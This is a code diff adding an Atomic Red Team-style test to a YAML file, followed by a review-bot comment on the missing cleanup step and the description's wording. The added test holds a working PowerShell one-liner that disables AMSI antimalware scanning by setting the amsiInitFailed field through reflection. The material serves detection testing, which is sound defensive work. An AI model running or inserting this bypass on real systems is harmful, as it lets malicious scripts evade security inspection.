diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml
index 30f5839e..83a9f35a 100644
--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -150,3 +150,16 @@ atomic_tests:
 sysmon -u
 cleanup_command: |
 sysmon -i -accepteula
+
+- name: AMSI Bypass - AMSI InitFailed
+description: |
+Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
+https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+supported_platforms:
+- windows
+
+executor:
+name: powershell
+elevation_required: false
+command: |
+[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
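Review bot: The new test defines no `cleanup_command`, although the preceding test in this same hunk has one; the `amsiInitFailed` field stays set for the rest of the PowerShell session, so a cleanup that restores it, `[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)`, would return the process to its normal inspected state after the test. The description text also needs correcting: `Any easy way to bypass AMSI inspection is it patch the dll` should read `An easy way to bypass AMSI inspection is to patch the DLL`, and it calls `amsiInitFailed` a function while the command itself treats it as a static field. A sentence stating that the effect is confined to the current process (no file or registry change, consistent with `elevation_required: false`) would help anyone using this test to validate detection coverage, since the reflection call in the command is the observable artifact rather than any on-disk change.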